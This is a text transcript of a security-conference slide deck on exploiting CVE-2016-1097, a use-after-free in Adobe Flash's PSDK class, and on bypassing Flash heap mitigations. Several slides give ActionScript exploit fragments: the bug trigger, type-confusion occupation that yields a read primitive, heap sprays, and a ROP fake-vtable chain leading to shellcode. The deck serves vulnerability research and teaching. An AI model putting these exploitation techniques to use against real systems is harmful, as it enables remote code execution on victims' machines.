Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation...
Transcript of Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation...
![Page 1: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/1.jpg)
Guanxing Wen
Use-After-Use-After-FreeExploit UAF by Genrating Your Own
![Page 2: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/2.jpg)
✤ Security Researcher at Pangu LAB
✤ Enthusiastic about Flash: ✤ Advanced vulnerability exploitation ✤ Find vulnerabilities
About Me
CVE-2016-1097
@hhj4ck
Internet Bug Bounty
![Page 3: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/3.jpg)
✤ Basis of Flash Exploition & Mitigation
✤ Overview of
Agenda
✤ Use-After-Use-After-Free (UAUAF): Go Beyond Mitigation
✤ Building the Exploit from Scratch
✤ Tips for 64-bit platform & Windows 10 Exploitation
✤ Conclusion
CVE-2016-1097
![Page 4: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/4.jpg)
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvector vector
![Page 5: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/5.jpg)
length
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvector
![Page 6: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/6.jpg)
length
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvectorRead Primitive
![Page 7: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/7.jpg)
length
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvectorRead Primitive
✤ Use-After-Free
vectorvector vector vectorvector vector
vector vectorvector vector
vectorvector vector vectorvector vector
vulnerable object
![Page 8: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/8.jpg)
length
Flash Exploit
✤ Heap Overflow
vector vulnerable buffer vectorvectorRead Primitive
✤ Use-After-Free
vectorvector vector vectorvector vector
vector vectorvector vector
vectorvector vector vectorvector vector
vulnerable object
![Page 9: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/9.jpg)
vectorvector vector vectorvector length
vector vectorvector vector
vectorvector vector vectorvector vector
vulnerable object
Flash Exploit
✤ Use-After-Free
length
✤ Heap Overflow
vector vulnerable buffer vectorvectorRead Primitive
Read Primitive
![Page 10: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/10.jpg)
MMgc
Mitigations
vtablerefcount
dummydummy
dummy
01
buffer
length
data
Vector
![Page 11: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/11.jpg)
Mitigations
MMgcvtable
refcount
dummydummy
dummy
01
buffer
length
data
Vector
MMgc
vtablerefcount
dummydummy
dummy
0
data
buffer
length
Vectorcookie
✤ length verification
![Page 12: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/12.jpg)
Mitigations
vtablerefcount
capacitylength
array
copyOnWritecheck_array
check_length
vtablerefcount
capacitylength
array
copyOnWrite
check_capacity
check_copyOnWrite
ByteArray ByteArray
✤ length verification
![Page 13: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/13.jpg)
StringBuffer LargeObjectTracker JSONSerializer DataList GCBitmap ZCT MMGCMetaData FastAllocator Code ByteArray
ByteArray & Vector
AS3 Objects
✤ Isolated Heap
Mitigations
MMgc
![Page 14: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/14.jpg)
MMgc
ByteArray & Vector
AS3 Objects
✤ Isolated Heap
Mitigations
Free
mem
![Page 15: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/15.jpg)
Mitigations
Heap Fengshui
Overflow
Read Primitive Gained
Find ROP Gadgets
Fake Vtable - RCE
Proper Occupation
Invoke Virtual Method
Heap Fengshui
Read Primitive Gained
Find ROP Gadgets
Fake Vtable - RCE
✤ Heap Overflow ✤ Use-After-Free
length verification
isolated heap
![Page 16: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/16.jpg)
Mitigations
Heap Fengshui
Overflow
Read Primitive Gained
Find ROP Gadgets
Fake Vtable - RCE
Proper Occupation
Invoke Virtual Method
Heap Fengshui
Read Primitive Gained
Find ROP Gadgets
Fake Vtable - RCE
✤ Heap Overflow ✤ Use-After-Free
length verification
isolated heap
![Page 17: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/17.jpg)
What is really necessary
![Page 18: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/18.jpg)
What is really necessary
✤ Read Primitive
✤ buffer[index]✤ find ROP gadgets, wrappers
✤ index < 0xFFFFFFFF ?
![Page 19: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/19.jpg)
What is really necessary
✤ Read Primitive
✤ buffer[index]✤ find ROP gadgets, wrappers
✤ index < 0xFFFFFFFF ?✤ buffer = Vector / ByteArray ?
![Page 20: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/20.jpg)
vtablerefcount
lengthbuffer
…
String
![Page 21: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/21.jpg)
vtablerefcount
lengthbuffer
…
String
![Page 22: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/22.jpg)
vtablerefcount
4Address
…
![Page 23: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/23.jpg)
vtablerefcount
4Address
…
![Page 24: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/24.jpg)
vtablerefcount
4Address
…
![Page 25: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/25.jpg)
Use-After-Use-After-Free
vtablerefcount
lengthbuffer
…
String obj.str is Read Primitive
![Page 26: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/26.jpg)
vtablerefcount
lengthbuffer
…
Use-After-Use-After-Free
vulnerableobject
![Page 27: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/27.jpg)
vtablerefcount
lengthbuffer
…
Use-After-Use-After-Free
![Page 28: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/28.jpg)
vulnobj.funcX obj.funcYvtablerefcount
lengthbuffer
…
Use-After-Use-After-Free
![Page 29: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/29.jpg)
vtablerefcount
lengthbuffer
…
Use-After-Use-After-Free
![Page 30: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/30.jpg)
✤ Free: Vulnerable object is released
✤ Use: Occupied with selected object
Use-After-Use-After-Free
✤ Free: Release selected object (type confused call)
✤ Use: Modify the address field via occupation
✤ obj.str of becomes a Read Primitive
✤ Free: Release the memory for next occupation
![Page 31: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/31.jpg)
Overview of CVE-2016-1097
![Page 32: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/32.jpg)
✤ Introduced in Flash Player 19 beta✤ playerglobal.swc + FFDEC + Beyond Compare
com.adobe.tvsdk.mediacore.PSDK
![Page 33: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/33.jpg)
com.adobe.tvsdk.mediacore.PSDK
✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare
✤ Introduced in Flash Player 19 beta
![Page 34: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/34.jpg)
✤ Introduced in Flash Player 19 beta
✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare
✤ Buggy
com.adobe.tvsdk.mediacore.PSDK
![Page 35: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/35.jpg)
✤ Introduced in Flash Player 19 beta
✤ Eliminated from Flash Player 19 release✤ Recurred in Flash 21 beta
✤ Undocumented Primetime Player SDK✤ playerglobal.swc + FFDEC + Beyond Compare
✤ Buggy
com.adobe.tvsdk.mediacore.PSDK
![Page 36: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/36.jpg)
CVE-2016-1097
function poc() { var ps:PSDK = PSDK.pSDK; ps.release(); ps.createdispatcher(); }
constructed automatically
atom is remained
inner memory is freed
![Page 37: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/37.jpg)
Exploit Development
![Page 38: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/38.jpg)
PSDK Class
vtable1vtable2
dummydummy
dummydummydummydummy
ps.createDispatcher()…~PSDK()
0x20
![Page 39: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/39.jpg)
Proper Occupation
com.adobe.mediacore.PSDK
![Page 40: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/40.jpg)
ContentFactory
Proper Occupation
com.adobe.mediacore.PSDK
![Page 41: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/41.jpg)
ContentFactory
Proper Occupation
com.adobe.mediacore.PSDK
MediaPlayer
![Page 42: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/42.jpg)
metadata.MetaData
ContentFactory
Proper Occupation
com.adobe.mediacore.MediaPlayer
![Page 43: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/43.jpg)
metadata.MetaData
Proper Occupation
com.adobe.mediacore.MediaPlayer
info.Track
![Page 44: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/44.jpg)
Proper Occupation
com.adobe.mediacore.info.Track
![Page 45: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/45.jpg)
Proper Occupation
Track name:String language:String( , )…
![Page 46: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/46.jpg)
Proper Occupation
Trackvtablelength
lengthbuffer
bufferflags
--
name:String
language:String
![Page 47: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/47.jpg)
vtable1vtable2
dummydummy
dummydummydummydummy
Type Confusion Call
ps.createDispatcher()PSDK
vtablelength
lengthbuffer
bufferflags
--
Track
![Page 48: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/48.jpg)
ps.createDispatcher() vtablelength
lengthbuffer
bufferflags
--
Track
Type Confusion Call
vtable1vtable2
dummydummy
dummydummydummydummy
![Page 49: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/49.jpg)
Type Confusion Call
ps.createDispatcher()PSDK
vtablelength
lengthbuffer
bufferflags
--
Trackvtable1vtable2
dummydummy
dummydummydummydummy
![Page 50: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/50.jpg)
Type Confusion Call
ps.createDispatcher()PSDK
vtable1
lengthj
bufferflags
--
Trackvtable1vtable2
dummydummy
dummydummydummydummy
![Page 51: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/51.jpg)
Type Confusion Call
ps.createDispatcher()PSDK
vtable0
lengthj
bufferflags
--
Trackvtable1vtable2
dummydummy
dummydummydummydummy
![Page 52: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/52.jpg)
Type Confusion Call
ps.createDispatcher() vtable1vtable2
dummydummy
dummydummydummydummy
PSDKvtablelength
lengthbuffer
bufferflags
--
Track
![Page 53: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/53.jpg)
vtablelength
lengthbuffer
bufferflags
--
Track
Type Confusion Call
![Page 54: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/54.jpg)
Metadata.setByteArray(key:String, obj:ByteArray)
![Page 55: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/55.jpg)
Metadata.setByteArray
✤ Alloc a temporary space
✤ Release the temporary space
✤ Do some calculation
![Page 56: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/56.jpg)
var mt:Metadata = new Metadata(); var bytes:ByteArray = new ByteArray(); bytes.length = 0x20; bytes.postion = 0x0C; bytes.writeInt(4); var ps:PSDK = PSDK.pSDK; ps.release(); var track:Track = new Track("j","lan",true,true); ps.createDispatcher();
proper occupation
release the memory block of Track
![Page 57: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/57.jpg)
bytes.writeInt(4); var ps:PSDK = PSDK.pSDK; ps.release(); var track:Track = new Track("j","lan",true,true); ps.createDispatcher();
bytes.postion = 0x10; bytes.writeUnsignedInt(0xadd7e555); mt.setByteArray("address", bytes); res = track.language; value = (res.charCodeAt(3)<<24) value|= (res.charCodeAt(2)<<16) value|= (res.charCodeAt(1)<<8) value|= (res.charCodeAt(0));
Read Primitive
![Page 58: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/58.jpg)
Code Execution
✤ Spray with Vector.<this> public function spray():void { gc_arr=new Array(); var len=(0x1000-0x28)/4; for(var i=0;i<0x10000;i++) { gc_arr[i]=new Vector.<Object>(); for(var j=0;j<len;j++) gc_arr[i][j]=this;
} }
![Page 59: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/59.jpg)
Code Execution
✤ Spray with Vector.<this>
this atom
public function spray():void { gc_arr=new Array(); var len=(0x1000-0x28)/4; for(var i=0;i<0x10000;i++) { gc_arr[i]=new Vector.<Object>(); for(var j=0;j<len;j++) gc_arr[i][j]=this;
} }
![Page 60: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/60.jpg)
Code Execution
✤ Find buffers through *this (HT tricks)
![Page 61: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/61.jpg)
Code Execution
✤ Find buffers through *this (HT tricks)
![Page 62: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/62.jpg)
Code Execution
✤ Find buffers through *this (HT tricks)
var ulimit_bytes:ByteArray; var output:String; var track:Track; var gc_arr:Array; var fill_bytes:ByteArray; var shellcode:ByteArray;
![Page 63: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/63.jpg)
vtable1vtable2
dummydummy
dummydummydummydummy
Code Execution
✤ Build a fake vtable with gadgets
~PSDK()
![Page 64: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/64.jpg)
Code Execution
✤ Build a fake vtable with gadgets
xchg eax, esp # pop esi # pop ebx # retnxchg eax, esi # retnpush 1 # push [eax-8] # push [eax-4] # call wrapper
jump to shellcode
=> esi~PSDK()
![Page 65: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/65.jpg)
DEMO
![Page 66: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/66.jpg)
64-bit Exploit
![Page 67: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/67.jpg)
ps = PSDK.pSDK; proper occupation
release the memory of MediaResource
ps.release(); ms = new MediaResource("jack", 0x54336677, null); try{ ps.createDefaultContentFactory(); }catch(e:Error){}
64-bit Exploit
![Page 68: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/68.jpg)
64-bit Exploit
var bytes:ByteArray = new ByteArray(); bytes.endian = "littleEndian"; bytes.position = 0x30; bytes.writeInt(1); mt.setByteArray("jack", bytes);
ps = PSDK.pSDK;
ps.release(); ms = new MediaResource("jack", 0x54336677, null); try{ ps.createDefaultContentFactory(); }catch(e:Error){}
![Page 69: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/69.jpg)
64-bit Exploit
✤ Heap Spray MMgc Object
![Page 70: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/70.jpg)
64-bit Exploit
✤ Heap Spray malloced Objectsgc_arr = new Array(); ad = new AdClick("","",""); ms = new MediaResource("jack",0x54336677,null); mt = new MetaData(); for(var i=0;i<0x80000;i++) { gc_arr[i]=new AdAsset("",1,ms,ad,mt); }
